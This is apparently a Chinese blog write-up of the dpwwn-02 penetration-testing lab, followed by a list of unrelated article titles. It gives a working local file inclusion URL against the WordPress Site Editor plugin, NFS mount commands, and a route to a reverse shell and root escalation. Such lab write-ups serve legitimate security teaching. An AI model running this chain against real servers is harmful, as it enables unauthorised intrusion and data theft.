dpwwn-02靶机渗透
dpwwn-02靶机渗透
将两台机器都配置为net模式。
进行一下内网扫描:
发现主机10.10.10.10,进行端口扫描。
发现有80,111,443,2049等端口开放,443值得注意。
访问网站告诉我们:dpwwn-02 GOAL IS SIMPLE : OBTAIN: # shell like root@dpwwn-02:~#
进行目录爆破,发现wordpress,访问http://10.10.10.10/wordpress/
。
利用wpscan扫描一下,发现插件。
枚举一下用户:发现admin用户。
搜索一下漏洞。
发现一个本地文件包含的漏洞,是18年的,根据dirb扫描出来的地址,生成payload:http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
。
成功执行,但是没办法getshell,看一下2049,以及443端口。
发现/home/dpwwn02目录可以挂载,进行挂载。
mkdir /mnt/dpwwn02
mount 10.10.10.10:/home/dpwwn02 /mnt/dpwwn02
msf设置一下,访问网页,进行shell反弹。
http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/home/dpwwn02/shell.php
。
进入交互页面:
发现定时计划在日志目录下clear-apache2.sh
但是没有执行权限。
发现find命令以及mount命令,都可以进行提权。
最新文章
- 触控的手牌—Cocos Creator
- QLPreViewController的初步实用
- Grunt备忘录
- Powerdesigner自定义DBMS(以derby数据库为例)
- Jexus &; Mono 迁移
- WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform
- Rhel6-集群管理(luci&;&;ricci)配置文档
- Web应用开发工具及语言需要具备的功能探索
- php序列化,反序列化
- 为什么从PhoneGap中逃离
- Cocos2d html5 笔记 1: overview
- Golang-interface(四 反射)
- Python_day1 基础语法
- Linux-使用patch命令给uboot打补丁(3)
- 安装RabbitMQ编译erlang时,checking for c compiler default output file name... configure:error:C compiler cannot create executables See 'config.log' for more details.
- JAVA中循环删除list中元素的方法总结【转】
- PAT B1023
- CentOS 7安装配置Samba服务器(挂载共享文件夹)
- Entity Framework(EF的Model First方法)
- SQL Server,MySQL,Oracle三者的区别